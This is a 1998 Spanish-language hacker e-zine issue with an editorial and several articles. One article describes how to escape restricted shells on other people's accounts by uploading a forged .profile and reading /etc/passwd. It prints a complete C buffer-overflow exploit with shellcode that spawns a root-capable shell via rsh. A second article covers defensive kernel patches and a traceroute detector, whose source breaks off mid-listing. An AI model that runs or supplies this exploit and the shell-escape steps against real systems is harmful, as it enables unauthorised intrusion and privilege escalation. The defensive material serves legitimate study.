home *** CD-ROM | disk | FTP | other *** search
Text File | 2002-05-27 | 128.6 KB | 2,981 lines |
-
-
-
- ╔────────────────────────────╗
- │ ┌──────┐ │
- │ │██████│ │
- │ ┌──────┤██┌───┘ │
- │ ┌──────┤██████│██└─┐ │
- │ │██████├─┐██┌─┤████│ │
- │ └─┐██┌─┴┐│██│J│██┌─┘ │
- │ ┌──┐│██│██└┘██│J│██│ │
- │ │██└┘██│██████│F├──┘ │
- │ │██████├──────┴─┘ │
- │ └──────┘ │
- │ H A C K E R S T E A M │
- │ J O U R N A L │
- ╠────────────────────────────╣
- │ VOL. #1, Nº5, 1998. │
- ╚────────────────────────────╝
-
-
- "LA PACIENCIA ES LA LLAVE DEL CONOCIMIENTO"
-
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
- de la informacion aqui expuesta y tampoco tiene que estar
- de acuerdo con lo que sus colaboradores opinen.
- Tampoco esperamos que la gente use la informacion aqui expuesta
- para hacer daño ya que tan solo es con fines didacticos.
-
- Recomendado el uso del editor del MS-DOS.
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- #CURRENT MEMBERS :
-
- - CONDE VAMPIRO - CODER H/P/V EDITOR
- - MAC CRACK BISHOP - CODER C/P WEBMASTER
-
- #WEB OFICIAL :
-
- - http://www.angelfire.com/mi/JJFHackers
- - http://jjfhackers.home.ml.org
-
- #E-MAIL OFICIAL :
-
- - jjf_team@usa.net
-
- #LLAVE PGP OFICIAL :
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.6.3ia
-
- mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
- BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
- ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
- tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
- 9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
- IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
- NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
- =Wu00
- -----END PGP PUBLIC KEY BLOCK-----
-
- #DISTRIBUIDORES OFICIALES DEL E-ZINE :
-
- - http://wakanda.islatortuga.com
- - http://underhack.islatortuga.com
- - http://teleline.es/persona/dep_blue
- - http://members.xoom.com/baron_rojo/
- - http://oioio.dyn.ml.org
-
- #MIEMBRO OFICIAL (web ring) DE :
-
- - Black Angels
- - Spanish Underground Web Ring
-
- #COLABORADORES CON ESTE NUMERO :
-
- - CubikIce
- - Nobody
- - Estado Porcino (WKT)
-
- #SALUDOS :
-
- - Metalslug (Wakanda)
- - Schoddy Guy (Underhack)
- - Cheroky
- - Silicon Dragon
- - Paseante (SET)
- - Dr Slump (oioio)
-
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
- <────────────────────────────────────────────────────────────────────────────>
-
- - INDICE.
-
- TITULO AUTOR
- ────────────\_______________________________/────────────
-
- * EDITORIAL ................................ J.J.F. / HACKERS TEAM
- * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
- * HERRAMIENTAS PARA USUARIOS DE LINUX
- (PARANOICOS?) ............................ CUBIKICE.
- * CURSO DE HACK V .......................... CONDE VAMPIRO.
- * COMO CRACKEAR NORTON CRASHGUARD
- DELUXE 3.0 ............................... ESTADO PORCINO.
- * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
- * EL LECTOR OPINA .......................... VARIOS.
- * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- -------------
- │ EDITORIAL │
- -------------
-
- Como siempre volvemos a la carga con un nuevo numero de vuestro ezine
- favorito que siempre trae suculentos articulos. Pero por lo visto en los
- mail's de nuestros lectores, se puede apreciar que muchos nos deciis que
- nos pasamos con las materias aqui tratadas, otros que quereis informacion
- underground con el unico fin de colaros en computadoras ajenas, esto
- señores mios!, es totalmente irracional. La filosofia de este ezine no se
- asemeja a esto ni por casualidad. Nosotros desde aqui lo unico que
- pretendemos es informar a la gente pero nunca con fines delictivos ni nada
- parecido, incluso estariamos encantados que los Administradores, expertos
- en seguridad, las autoridades, nos escriban articulos o sus opiniones, ya
- que este ezine esta pensado para todo el mundo.
-
- AVISAMOS, que la llave PGP que durante algunas semanas ha estado en
- la web disponible, ya NO es nuestra llave oficial, por eso os avisamos
- que nuestra llave oficial es esta que trae el ezine :) y tb la que esta
- ahora en el web.
-
- Por fin, como muchos lectores nos habian solicitado hemos puesto
- tanto en el web como en el ezine, nuestra llave publica, con el fin de
- aquellos que nos quieran decir algo mas confidencialmente lo puedan hacer
- sin ningun problema, como siempre mejoramos los servicios ;-) Ademas en
- este numero a los distribuidores oficiales se nos unen los de Oioio, ya
- conocidos en nuestro ezine :), pero este web solo esta disponible en
- ciertas ocasiones, que conste!!
-
- Con este numero termina nuestro primer volumen, el cual pensamos,
- que esta muy bien para la poca ayuda que recibimos por el momento, con
- permiso de un conocido politico que en un meeting dijo 'Menos aplausos y
- mas votos', yo digo 'Menos felicitaciones y mas articulos', esto solo
- intenta ser una reflexion entre los lectores, ya que este ezine lo hacemos
- todos no solo nosotros, siempre hay trabajo para todos.
-
- Deciros que ultimamente el USA.NET, el servidor donde nos enviais el
- correo no ha funcionado muy bien que digamos, por eso seguramente vuestros
- mail's no han llegado, por lo que simplemente nos vuelves a escribir y
- listos. Tambien deciros que procuramos que el web este siempre actualizado
- pero teneis que comprender que siempre se nos queda algun link antiquado,
- ya que el web es muy dinamico y hacemos lo que podemos, okis ?
-
- Bueno, chicos, ahora que ya estamos casi en verano, es hora de
- quitar el polvo a los ordenadores y hacer algo util en nuestras vidas, como
- por ejemplo investigar aquella cosa que te tiene tan intrigado y despues
- escribir un articulo sobre ello. Ahora ya no teneis excusa para trabajar
- un poco ;-)
-
- Que empieze lo bueno de una vez, pero no antes sin decirte que
- esperamos vuestros mail's con vuestras criticas, sugerencias, comentarios o
- cualquier cosa que nos quieras decir, y por supuesto vuestros actos de hack
- y tambien los programas que hayas creado para distribuirlos ;-), pues dicho
- todo lo que tenia que decir, escribe a:
-
- jjf_team@usa.net
-
- NOTA DEL WEBMASTER: Como ya habeis leido un poco mas arriba de esta
- editorial, los web los intento actualizar lo mas que puedo, ya se que hay
- de vez en cuando algunos links que no funcionan y que antes lo hacian,
- estoy en ello. Muchas veces esto pasa porque los servers a los que les he
- puesto el link se han caido, o estan de remodelacion. Una cosa que si
- quiero dejar clara, es que las web se actualizan periodicamente y los links
- se comprueban casi diariamente con el fin de que sigan funcionando perfec-
- tamente y a gusto de todos. Otra cosa, en vez de mandarme un mail diciendo
- que no funcionan los links (algunos) mejor, decirme cuales NO funcionan e
- intentare arreglarlos lo antes posible. Gracias. ;-)
-
-
-
- - J.J.F. / HACKERS TEAM -
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
- 15-05-1998.
- ????????
-
- ()()()()()()()()()()()()()()()()()
- () HACK RSH (RESTRICTED SHELL) ()
- ()------------------------------()
- () by Nobody ()
- ()()()()()()()()()()()()()()()()()
-
- Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta
- de un servidor, nos encontramos con el famoso RSH 'restricted shell', que
- es un shell restringido, el cual es establecido por el administrador del
- sistema, para anular la ejecucion de comandos que pueden comprometer la
- seguridad del sistema, o incluso anulan el comando 'cd' para que no
- podemos salir de nuestro directorio de trabajo.
-
- Basicamente, lo que haremos aqui es explicar diferentes tecnicas,
- para poder saltarnos el rsh :), que conste que puede que estos metodos no
- funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos,
- solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza.
-
- Ahora lo mejor sera describir las restricciones que aplica el RSH,
- y como funciona. Estas restricciones son :
-
- - Los usuarios no pueden moverse de su directorio propio, ya que la orden
- 'cd' esta descapacitada.
-
- - Los usuarios no puden cambiar el valor de la variable PATH, de modo que
- solo pueden ejecutar ordenes en el PATH que les proporciona el
- administrador del sistema.
-
- - Los usuarios no pueden cambiar el valor de la variable SHELL.
-
- - Los usuarios no pueden ejecutar ordenes en directorios a los que
- aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que
- contegan una barra diagonal '/'.
-
- - Los usuarios no pueden redirigir la salida usando '>' o '>>'.
-
- - Los usuarios no pueden utilizar ordenes exec.
-
- Como podemos ver el RSH, nos deja bastante limitados en el manejo del
- sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile
- del usuario. El administrador debe preparar el fichero .profile, cambiando
- el propietario del fichero a root y ademas debe cambiar los permisos en el
- fichero para que nadie escriba en el mismo. El administrador define el
- PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar
- comandos en su directorio especifico, generalmente se suele denominar
- /usr/rbin.
-
- En realidad el RSH suele ser el shell SH pero invocado mediante el
- parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker
- puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar
- bastante ya que nos librara de muchos que juegan a hackers ;-)
-
- Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en
- cada directorio de los usuarios hay unos determinados ficheros, que sirven
- para configuraciones y a que podemos acceder, etc. Por ejemplo para ver
- estos ficheros que son ocultos ejecutamos en el prompt :
-
- $ ls -al
- total 14
- drwxr-xr-x 2 500 nobo 1024 May 7 20:18 .
- drwxr-xr-x 6 root root 1024 May 7 16:05 ..
- -rw-r--r-- 1 500 nobo 3768 Nov 7 1997 .Xdefaults
- -rw-r--r-T 1 root root 143 May 7 14:52 .bash_history
- -rw-r--r-- 1 500 nobo 24 Jul 14 1994 .bash_logout
- -rw-r--r-- 1 500 nobo 220 Aug 23 1995 .bash_profile
- -rw-r--r-- 1 500 nobo 124 Aug 23 1995 .bashrc
- -rw-rw-r-- 1 500 nobo 3336 Oct 24 1997 .screenrc
- $
-
- Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen
- tener los usuarios en sus directorios, los ficheros que nos interesan
- para este caso seran el .profile, aqui como .bash_profile y el .login
- que aqui no esta presente, que suele estar en algunos sistemas.
-
- Que podamos saltarnos el RSH se debe al descuido de los
- administradores, ya que esta considerado peligroso dejar el .profile en el
- directorio del usuario, debido a que muchas veces podemos sustituir el
- .profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que
- tenemos que hacer es crear un .profile en nuestra maquina, despues lo
- subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet
- conectamos a la cuenta y ya estaremos usando el .profile que hayamos
- insertado :). Esto se debe a que aunque el .profile sea de propiedad root
- se encuentra en el directorio del usuario, por esta razon el usuario o en
- nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell
- tenemos, basta que mirremos el etc/passwd que es un fichero de lectura
- publica, aunque este en shadow podemos ver la ubicacion de los directorios
- de los usuarios y los shell's asignados, esto lo haremos de la siguiente
- manera:
-
- $ vi /etc/passwd
-
- Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH,
- pero para aquellos que tengan un administrador mas avispado, que utilizen
- el siguiente programa, el cual desborda la memoria.
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- /*
- SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
- Created: 8/15/97
-
- Give thanks to Solar Designer for his su overflow, this is based
- on that peice of work.
-
- This is for educational purposes only, in no way am I responsible
- for what you do with this. This should be used by sys admins, or
- people who have permission of the admin to run it to see if this
- hole can exist on their system. If you use it for the wrong reasons
- then I say *tisk* on you. I will not be held responsible for your
- actions.
-
- This could be done with a generic overflow program, but just
- running this is easier.
-
- USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
- MESSAGE ANYBODY ON IRC ABOUT THIS.
-
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- char *shellcode =
- "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
- "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
- "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
- "\xcd\x80/"
- "/bin/sh"
- "0";
- char *get_sp() {
- asm("movl %esp,%eax");
- }
- #define bufsize 2048
- char buffer[bufsize];
- main() {
- int i;
- for (i = 0; i < bufsize - 4; i += 4)
- *(char **)&buffer[i] = get_sp() - 3072;
- memset(buffer, 0x90, 512);
- memcpy(&buffer[512], shellcode, strlen(shellcode));
- buffer[bufsize - 1] = 0;
- setenv("NLSPATH", buffer, 1);
- system("clear");
- printf("______________________________________________________________\n");
- printf("| RSH Overflow -- (c) shit-head 1997\n");
- printf("| Give props to Solar Designer for his su overflow, this is based
- on that.\n");
- printf("|\n");
- printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n");
- printf("|\n");
- printf("| *NOTE* I'm not responsible if you abuse this. Run only w/
- premission\n");
- printf("| Sending Overflow.... Done.\n");
- printf("--------------------------------------------------------------\n");
- execl("/usr/bin/rsh", "/usr/bin/rsh", NULL);
- }
-
- ------------ FIN -------------------------------------------------------------
-
- Bueno, gente esto es todo por hoy y espero que os haya gustado el
- tema. Logicamente el RSH tiene mas truco pero no tiene gracia si os lo
- digo todo ;-)
-
- Y desde aqui saludar a toda la peña de #seguridad_informatica!!!!!
-
- Grupos como - J.J.F. / HACKERS TEAM - , CYBERHACK, WAKANDA, UNDERHACK,
- @pOkalypSYS, Oioio y todos los demas !!
-
- Y por supuesto : Bisho, Folixia, Fragel, Ipgh0st, Metalslug, Dillet,
- Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, Schoddy Guy, Xus,
- Enif, Bit-Quake, L.A., Nadia, Amanda, Case_zero, DrSlump, Prova, Marsuff,
- Meroka, Eli, Minister, ElCoronel, Daek, Cosmic, Net Bull, Profesor Falken,
- Icehouse y todos los que me dejo :)
-
- NOBODY (c) 1998.
-
- <────────────────────────────────────────────────────────────────────────────>
- ██████████████████████████████████████████████████████████████████████████████
- <────────────────────────────────────────────────────────────────────────────>
-
- No creo que haya que decir que todo esto es por mero interes educativo!
- o si? :)
-
- /////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
- [ Phrack Magazine Volume 7, Issue 5, Article 03 of 17]
-
-
- Herramientas para usuarios de Linux (paranoicos?)
- -------------------------------------------------
-
- por whynot AKA baldor
-
- !!Se necesitan conocimientos basicos de TCP/IP para entender este articulo¡¡
-
- Recientemente no solo el numero de ataques a servidores grandes o
- comerciales y maquinas con conexiones rapidas ha crecido, tambien muchos
- usuarios con conexion via telefonica han sido atacados o espiados. Un buen
- ejemplo es el programa winnuke.c que fue enviado a BugTraq y ha sido usado
- con exceso.
-
- Aqui, de lo que se trata no es de que sean lanzados hacia grandes
- servidores, sino de que pueden llegar a ser agobiantes si algun idiota
- intenta hackearte, para ralentizar tu conexion o tirar tu maquina.
-
- Muchas distribuciones de Linux han reaccionado ante tal desarrollo y
- han hecho que sus daemons de telnet/ftp/otros logueen cualquier acceso. Por
- la misma razon puedes poner furiosas medidas de seguridad en tu
- /etc/hosts..deny. Pero en mi opinion hay un par de cosas que se olvidan de
- las que yo quisiera hablar aqui.
-
- 1. Detectando traceroutes.
-
- Traceroute es un comando realmente poderoso que es normalmente usado
- para detectar donde y a que red esta conectado el ordenador que esta siendo
- trazado. Por una serie de razones simplemente *no* puedes evitar que otra
- persona te tracee, por eso lo mejor que puedes hacer es detectar *si*
- alguien te esta traceando o encontrar *quien* te esta traceando y
- confundirle un poco.
-
- 1.1 Como trabaja traceroute?
-
- Basicamente traceroute envia unos paquetes IP/UDP de prueba al host
- especificado. Para saber como es rutado el paquete (por que hosts esta
- pasando) traceroute usa el campo TTL (Time To Live) de la cabecera IP.
- El campo TTL especifica el limite superior de routers por los cuales pasa el
- paquete hasta que se pierde. Cada router decrementa el valor de este campo
- cuando llega el paquete en cuestion, hasta que llega a 0. Si esto ocurre
- el router envia el mensaje ICMP TIME_EXCEED al host que envía el paquete.
-
- Por eso la estrategia que traceroute usa para trazar la ruta de un
- paquete es enviar paquetes al host objetivo poniendole un valor que se
- incrementa (empezando con 1) en el campo TTL. Si un host envia el mensaje
- ICMP TIME_EXCEED traceroute muestra su direccion y el tiempo que ha pasado
- desde el envio del paquete de prueba IP/UDP hasta la recepción del ICMP
- TIME_EXCEED. Tras eso prepara un nuevo paquete de prueba con un TTL una
- unidad mayor que el paquete anterior.
-
- Traceroute sigue haciendo esto hasta que recibe un paquete ICMP
- PORT_UNREACHABLE desde el ordenador objetivo, o hasta que llega al numero
- maximo de hops (saltos) que le hayamos indicado (por defecto 30).
-
- Para comprender todo esto deberiamos echarle un vistazo a la parte
- UDP del paquete que hemos hablado arriba. Para detectar que algo ha llegado
- al host objetivo y no enviar mas paquetes traceroute usa el protocolo UDP.
- La parte UDP del paquete de prueba esta dirigida a un puerto que nunca, o
- muy raramente se usa (en los Unix mas modernos es 33434 mas el TTL incluido
- en el paquete IP). Como (normalmente) nada esta escuchando en el puerto
- 33434 (o uno superior) el host objetivo envia una señal de ICMP
- PORT_UNREACHABLE que le indica a traceroute que ha encontrado al host
- objetivo y debe parar de enviar paquetes.
-
- Teniendo en cuenta que la mecanica de traceroute es un poco compleja
- aqui tenemos un ejemplo un poco simplificado. Digamos que tu eres el host
- 'source' y estas trazando tu ruta hacia el host 'target'
-
- source:/root # traceroute target
- traceroute to target (134.2.110.94), 30 hops max, 40 byte packets
-
- Ahora 'source' envía un paquete de prueba al host 'target' (puerto
- 33434) con un TTL de 1. El paquete pasa entonces por 'host_entremedio' y el
- router decrementa el TTL del paquete, descubre que el paquete ha "expirado"
- (TTL=0) y envia de vuelta un ICMP TIME_EXCEED a 'source'. Ahora traceroute
- usa la informacion incluida en este paquete para mostrar los datos del
- primer host por donde estan pasando los paquetes:
-
- 1 host_entremedio (142.45.23.1) 2.456 ms
-
- 'source' envia otro paquete de prueba, esta vez el TTL es 2 y el
- puerto es 33434+1 = 33435. Recibe otro paquete de vuelta ICMP TIME_EXCEED
- desde 'otro_host':
-
- 2 otro_host (142.45.10.1) 3.983 ms
-
- La tercera prueba tiene el TTL puesto a 3 y es dirigida al puerto
- 33436. Es ahora cuendo Traceroute recibe un ICMP PORT_UNREACHABLE desde
- 'target':
-
- 3 target (142.45.10.13) 4.032 ms
-
- Ahi esta ! Traceroute ha terminado su trabajo y se finaliza.
-
- source:/root #
-
- Hay que decir que, por defecto, traceroute envia tres paquetes
- conteniendo el mismo TTL (cada paquete a un numero de puerto incrementado)
- para determinar el tiempo de respuesta de un host con mas exactitud. En
- realidad, traceroute nos muestra algo como esto:
-
- traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
- 1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms
-
- 1.2 El funcionamiento del detector de traceroute.
-
- Sabiendo como trabaja traceroute es muy facil detectarlo. Simplemente
- pon tus sockets a escuchar en el puerto 33434 y superiores y reacciona
- si recibes algun paquete. Puedes intentar adivinar con cuantos hops te
- estan traceando restando 33434 al puerto donde has recibido el paquete y
- dividiendo el resultado por 3.
-
- Escuchar en el puerto por el que traceroute envia el paquete de prueba
- tiene un bonito efecto: no enviar de vuelta un paquete ICMP TIME_EXCEED ni
- una señal de ICMP PORT_UNREACHABLE. Obtendr un timeout por respuesta y
- pondra un * en la lista de hosts porque con un timeout traceroute *no*
- reconocer que ha pasado por su objetivo y continuar enviando paquetes de
- prueba hasta que el numero maximo de hops sea alcanzado.
-
- Con el pequeño programa detecttr corriendo (y escuchando en los
- puertos 33434 - 33434*30*3) un traceroute a nuestro host apareceria asi:
-
- schnecke:/root # traceroute localhost
- traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets
- 1 * * *
- 2 * * *
- .
- .
- .
- 30 * * *
-
- 1.3 Problemas detectando traceroutes.
-
- El unico problema con la deteccion de traceroutes es que alguien
- puede especificar un numero de puerto distinto del que hay por defecto o
- usar otra tecnica. Nunca he visto a nadie hacer esto, asi que si el idiota
- de turno (o un wannabe cualquiera) te esta trazando tus posibilidades de
- detectarlo son bastante altas.
-
- Si eres *realmente* paranoico con los traceroutes no deberias usar
- los puertos para detectar un traceo pero puedes editar el fichero que
- maneja los paquetes UDP. El fichero es: /usr/src/linux/net/ipv4/udp.c
-
- (NOTA: Este fichero es parte del kernel. Recompila el kernel para que
- los cambios tengan efecto)
-
- Inserta la linea:
-
- printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n",
- in_ntoa(daddr));
-
- Tras la linea 833:
-
- ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de);
-
- Esto hara que el sistema loguee *todas* las entradas a puertos que
- no esten escuchando algo con el protocolo UDP. Hay que decir que el bonito
- efecto descrito en el capitulo 1.2 no ocurriria (lo cual tambien podria ser
- una ventaja).
-
- BTW: Por favor, ten cuidado cuando edites el kernel - realmente lo
- necesitas :)
-
- 1.4 Un ejemplo de implementacion.
-
- detecttr.c -> Mira al final de este fichero
-
- 2.Detectando pings.
-
- Hubo un monton de discusion en los ultimos meses sobre ping porque ha
- sido usado con bastante frecuencia para transmitir gruesos paquetes a otros
- hosts que acabaron en crashes. A pesar de que este bug ha sido corregido en
- muchos hosts, el comando ping sigue siendo muy popular para ralentizar el
- modem de quienes estan en la Red, la conexion se les viene abajo debido a
- un GRAN lag.
-
- *No* puedes evitar que alguien te haga un ping (a no ser que tu ISP
- bloquee todos los paquetes ICMP_ECHO hacia tu ordenador) y tampoco que ping
- este aumentando el trafico en tu modem. Pero puedes detectar *quien* te ha
- hecho un ping, determinar el tamaño del paquete ping y decidirte a no
- contestarle (esto *puede* reducir en 2 veces el ancho de banda de tu modem).
-
- 2.1 Como trabaja ping y como la gente ralentiza otras conexiones usando
- ping?
-
- Resumiendo, ping envia un paquete conteniendo un ICMP_ECHO y algunos
- datos mas al host objetivo el cual contestar con un paquete ICMP_ECHOREPLY
- que contiene, ademas, los datos enviados (solo se modifican unos pocos
- campos).
-
- Normalmente ping esperar un 1 segundo despues de enviar el siguiente
- ICMP_ECHO. En muchas implementaciones de ping se puede pasar por alto este
- segundo y hacer un 'floodping' que *no* esperar y enviar los paquetes tan
- rapido como sea posible. Si eliges un tamaño grande de paquete y tu
- conexion es rapida (T1 o Ethernet) esto causar un monton de trafico en el
- modem de tu victima y acabara ralentiza ndolo hasta desconectarlo.
-
- 2.2 Como puedo detectar un ping y como puedo evitar que me flodeen?
-
- Como un ping no es mas que un ICMP_ECHO con algunos datos añadidos
- simplemente puedes interceptarlo, extraer la direccion del que te lo envia
- y el tamaño del paquete y decidir si quieres responderle o no. Si el ping
- no es un flood-ping puedes reducir la cantidad de datos que transfieres
- desde tu modem simplemente no respondiendole. Pero si alguien te esta
- haciendo un floodping no te ayudar mucho el no responderle --> los paquetes
- ping probablemente estan causandote demasiado trafico y ralentizando tu
- conexion (mientras el host desde donde vienen los floodpings tenga una
- conexion lenta). Por lo menos siempre puedes darle una oportunidad...
-
- 2.3 Ejemplo de implementacion
-
- El manejo del ICMP_ECHO le corresponde al kernel. Edita el fichero
- /usr/src/linux/net/ipv4/icmp.c y busca la seccion 'Handle ICMP_ECHO'.
- Estas 16 lineas de codigo son todo lo que necesitas modificar para
- defenderte contra/detectar los ping-floods.
-
- Si sabes un poco de C podras ver que hay un define
- "CONFIG_IP_IGNORE_ECHO_REQUESTS" que puedes usar para que el el kernel
- ignore todos ICMP ECHO_REQUESTs entrantes. Pero queremos ser mas selectivos.
- Queremos hacer un log de todos los pings que envien a nuestra maquina.. Esto
- lo haremos insertando la linea:
-
- printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr),
- icmp_param.data_len);
-
- tras el #endif.
-
- Es facil cambiar la seccion "Handle ICMP_ECHO" asi tu ordenador
- solo responder a los ICMP ECHO_REQUESTs que no sean muy voluminosos e
- ignorar los pings con paquetes de gran tamaño.
-
- icmp.patch
- static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct
- device
- *dev, __u32 saddr, __u32 daddr, int len)
- {
- #ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS
- struct icmp_bxm icmp_param;
- if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de
- datos */
- icmp_param.icmph=*icmph;
- icmp_param.icmph.type=ICMP_ECHOREPLY;
- icmp_param.data_ptr=(icmph+1);
- icmp_param.data_len=len;
- if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0)
- icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos);
- printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",
- in_ntoa(saddr),icmp_param.data_len);
- }
- else
- printk(KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n",
- in_ntoa(saddr),len );
- #endif
- kfree_skb(skb, FREE_READ);
- }
-
- ------------ Codigo Fuente ---------------------------------------------------
-
- detecttr.c
- /*
- * detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com)
- * creado el: 08.05.97
- * ultima modificacion: 11.07.97
- * Plataformas: Linux, FreeBSD, podria funcionar con otros sistemas POSIX
- * tambien.
- *
- * Compilacion:
- * usa "gcc -o detecttr detecttr.c" para GNU C y
- * "cc -o detecttr detecttr.c" para otros compiladores...
- *
- * Uso:
- * Ejecuta este programa al arrancar la maquina permanecer en background
- * hasta que alguien te haga un traceroute. Solo hace un *miserable* uso de
- * tu RAM y cerca de un 0% de uso de tu CPU :)
- *
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <errno.h>
- #include <string.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <sys/socket.h>
- #include <sys/wait.h>
- #include <sys/time.h>
- #include <sys/signal.h>
- #include <sys/syslog.h> /* comenta esta linea si no tienes syslog.h */
- #include <netdb.h>
-
-
- #define MAXBUFLEN 200
- #define MYPORT 33435
- #define NUMPORTS 30*3
-
- int sockfd[NUMPORTS];
-
-
- void shutitdown()
- {
-
- int w;
- char buf[50];
- for (w=0; w<NUMPORTS; w++)
- close(sockfd);
- sprintf (buf,"DetectTraceroute terminado\n");
- syslog(LOG_NOTICE , buf);
-
- exit(0);
- }
-
- char *getname (struct in_addr addr)
- {
- struct hostent *h;
- int w;
- char foo[4]; /* los 4 numeros se usan como valores ASCII en un char */
- int tmpint[4]; /* se usa para convertir un string en 4 numeros */
- char tmpbuf[20];
-
- sprintf(tmpbuf, "%s", inet_ntoa(addr));
-
- if ( sscanf(tmpbuf,"%d.%d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2],
- &tmpint[3]) != 4) {
- printf ("Error detectando nombre de host !\n");
- exit(1);
- }
-
- for(w=0; w<4; w++) foo[w]=tmpint[w];
-
- if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) {
- herror("gethostbyaddr");
- exit(1);
- }
- return h->h_name;
- }
-
- main(int argc, char *argv[])
- {
- int hops;
- struct sockaddr_in my_addr;
- struct sockaddr_in remote_addr;
- int addr_len, numbytes;
- char buf[MAXBUFLEN];
- int w;
- fd_set readfds;
-
-
- if( fork() !=0 ) return(0); /* Si no queremos usar el &... */
-
-
- signal(SIGHUP, SIG_IGN); /* ignorar SIGHUP */
-
- signal(SIGTERM, shutitdown); /* shutdown limpio */
-
- for(w=0; w<NUMPORTS; w++) {
-
- if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) {
- perror("socket");
- exit(1);
- }
- my_addr.sin_family = AF_INET;
- my_addr.sin_port = htons (MYPORT+w);
- my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
-
- bzero(& (my_addr.sin_zero), 8);
-
- if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) )
- == -1) {
- perror("bind");
- exit(1);
- }
- }
-
- FD_ZERO(&readfds);
- for(w=0; w<NUMPORTS; w++)
- FD_SET(sockfd[w], &readfds);
-
-
- sprintf (buf,"DetectTraceroute iniciado con exito\n");
- syslog(LOG_NOTICE , buf);
-
- while(1) {
- select(sockfd[NUMPORTS-1]+1, &readfds, NULL, NULL, NULL);
-
- for (w=0; w < NUMPORTS; w++) {
- if (FD_ISSET(sockfd[w], &readfds))
- hops = w;
- }
-
- addr_len = sizeof(struct sockaddr);
-
- if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr
- *)&remote_addr, &addr_len)) == -1) {
- perror("recvfrom");
- exit(1);
- }
-
- /* we use buf for misc stuff O:-) */
- sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d",
- inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1);
- syslog(LOG_NOTICE , buf);
- FD_ZERO(&readfds);
- for(w=0; w<NUMPORTS; w++)
